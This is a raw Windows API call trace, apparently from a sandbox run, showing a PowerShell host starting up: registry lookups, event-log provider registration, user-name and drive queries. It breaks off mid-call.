[0092.129] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2 [0092.129] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x3b0) returned 0x0 [0092.129] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2 [0092.129] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x3b4) returned 0x0 [0092.129] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2 [0092.129] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x3b8) returned 0x0 [0092.129] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2 [0092.129] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x3bc) returned 0x0 [0092.130] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2 [0092.130] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x3c0) returned 0x0 [0092.130] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2 [0092.130] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x3c4) returned 0x0 [0092.130] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2 [0092.130] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x3c8) returned 0x0 [0092.130] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x3cc) returned 0x0 [0092.130] RegCloseKey (hKey=0x3cc) returned 0x0 [0092.130] RegCloseKey (hKey=0x3a8) returned 0x0 [0092.131] RegCloseKey (hKey=0x3c8) returned 0x0 [0092.136] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b930008 [0092.140] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x37f4270*="WSMan", lpRawData=0x37f3fe0) returned 1 [0092.142] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.142] CoTaskMemFree (pv=0x2e4120) [0092.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.144] CoTaskMemAlloc (cb=0x804) returned 0x273e30 [0092.144] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x273e30, nSize=0x16d928 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d928) returned 0x1 [0092.145] CoTaskMemFree (pv=0x273e30) [0092.145] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.145] GetUserNameW (in: lpBuffer=0x293930, pcbBuffer=0x16d968 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d968) returned 1 [0092.145] CoTaskMemFree (pv=0x293930) [0092.145] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x37f97a8*="Alias", lpRawData=0x37f9538) returned 1 [0092.146] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.146] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.147] CoTaskMemFree (pv=0x2e4120) [0092.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.149] CoTaskMemAlloc (cb=0x804) returned 0x273e30 [0092.149] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x273e30, nSize=0x16d928 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d928) returned 0x1 [0092.149] CoTaskMemFree (pv=0x273e30) [0092.149] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.149] GetUserNameW (in: lpBuffer=0x293930, pcbBuffer=0x16d968 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d968) returned 1 [0092.149] CoTaskMemFree (pv=0x293930) [0092.150] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x37feda0*="Environment", lpRawData=0x37feb30) returned 1 [0092.151] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.151] CoTaskMemFree (pv=0x2e4120) [0092.152] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.152] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0092.152] CoTaskMemFree (pv=0x2e4120) [0092.152] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.152] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0092.152] CoTaskMemFree (pv=0x2e4120) [0092.153] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x16d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0092.153] SetErrorMode (uMode=0x1) returned 0x1 [0092.153] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x16d6e0 | out: lpFileInformation=0x16d6e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0092.153] SetErrorMode (uMode=0x1) returned 0x1 [0092.154] GetLogicalDrives () returned 0x4 [0092.155] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d240, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0092.156] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0092.156] SetErrorMode (uMode=0x1) returned 0x1 [0092.157] CoTaskMemAlloc (cb=0x68) returned 0x30c0d0 [0092.157] CoTaskMemAlloc (cb=0x68) returned 0x30c140 [0092.157] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30c0d0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x16d6b0, lpMaximumComponentLength=0x16d6ac, lpFileSystemFlags=0x16d6a8, lpFileSystemNameBuffer=0x30c140, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16d6b0*=0x9c354b42, lpMaximumComponentLength=0x16d6ac*=0xff, lpFileSystemFlags=0x16d6a8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0092.157] CoTaskMemFree (pv=0x30c0d0) [0092.157] CoTaskMemFree (pv=0x30c140) [0092.157] SetErrorMode (uMode=0x1) returned 0x1 [0092.157] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0092.158] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0092.158] SetErrorMode (uMode=0x1) returned 0x1 [0092.158] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d650 | out: lpFileInformation=0x16d650*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0092.158] SetErrorMode (uMode=0x1) returned 0x1 [0092.159] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0092.159] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0092.159] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0092.159] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0092.159] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0092.160] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d220, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0092.160] SetErrorMode (uMode=0x1) returned 0x1 [0092.160] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d480 | out: lpFileInformation=0x16d480*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0092.160] SetErrorMode (uMode=0x1) returned 0x1 [0092.160] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d220, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0092.160] SetErrorMode (uMode=0x1) returned 0x1 [0092.160] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d480 | out: lpFileInformation=0x16d480*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0092.160] SetErrorMode (uMode=0x1) returned 0x1 [0092.161] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0092.161] SetErrorMode (uMode=0x1) returned 0x1 [0092.161] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d520 | out: lpFileInformation=0x16d520*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0092.161] SetErrorMode (uMode=0x1) returned 0x1 [0092.161] CoTaskMemAlloc (cb=0x804) returned 0x273e30 [0092.161] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x273e30, nSize=0x16d928 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d928) returned 0x1 [0092.161] CoTaskMemFree (pv=0x273e30) [0092.161] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.162] GetUserNameW (in: lpBuffer=0x293930, pcbBuffer=0x16d968 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d968) returned 1 [0092.162] CoTaskMemFree (pv=0x293930) [0092.162] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3805e90*="FileSystem", lpRawData=0x3805c20) returned 1 [0092.163] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.163] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.163] CoTaskMemFree (pv=0x2e4120) [0092.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.165] CoTaskMemAlloc (cb=0x804) returned 0x273e30 [0092.165] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x273e30, nSize=0x16d928 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d928) returned 0x1 [0092.165] CoTaskMemFree (pv=0x273e30) [0092.165] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.165] GetUserNameW (in: lpBuffer=0x293930, pcbBuffer=0x16d968 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d968) returned 1 [0092.165] CoTaskMemFree (pv=0x293930) [0092.166] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x380b6d0*="Function", lpRawData=0x380b460) returned 1 [0092.169] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.169] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.169] CoTaskMemFree (pv=0x2e4120) [0092.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.242] CoTaskMemAlloc (cb=0x804) returned 0x2742c0 [0092.242] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2742c0, nSize=0x16d928 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d928) returned 0x1 [0092.242] CoTaskMemFree (pv=0x2742c0) [0092.242] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.242] GetUserNameW (in: lpBuffer=0x293930, pcbBuffer=0x16d968 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d968) returned 1 [0092.242] CoTaskMemFree (pv=0x293930) [0092.243] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x382def8*="Registry", lpRawData=0x382dc88) returned 1 [0092.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.246] CoTaskMemAlloc (cb=0x804) returned 0x2742c0 [0092.246] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2742c0, nSize=0x16d928 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d928) returned 0x1 [0092.246] CoTaskMemFree (pv=0x2742c0) [0092.246] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.246] GetUserNameW (in: lpBuffer=0x293930, pcbBuffer=0x16d968 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d968) returned 1 [0092.246] CoTaskMemFree (pv=0x293930) [0092.247] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3833310*="Variable", lpRawData=0x38330a0) returned 1 [0092.249] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.249] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.249] CoTaskMemFree (pv=0x2e4120) [0092.252] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.252] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.252] CoTaskMemFree (pv=0x2e4120) [0092.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0092.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0092.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0092.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0092.317] CoTaskMemAlloc (cb=0x804) returned 0x2742c0 [0092.317] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2742c0, nSize=0x16d928 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d928) returned 0x1 [0092.317] CoTaskMemFree (pv=0x2742c0) [0092.317] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.317] GetUserNameW (in: lpBuffer=0x293930, pcbBuffer=0x16d968 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d968) returned 1 [0092.317] CoTaskMemFree (pv=0x293930) [0092.318] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3846f28*="Certificate", lpRawData=0x3846cb8) returned 1 [0092.326] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.326] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.326] CoTaskMemFree (pv=0x2e4120) [0092.329] GetLogicalDrives () returned 0x4 [0092.329] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0092.329] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0092.330] CoTaskMemAlloc (cb=0x20e) returned 0x2cb130 [0092.330] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2cb130 | out: 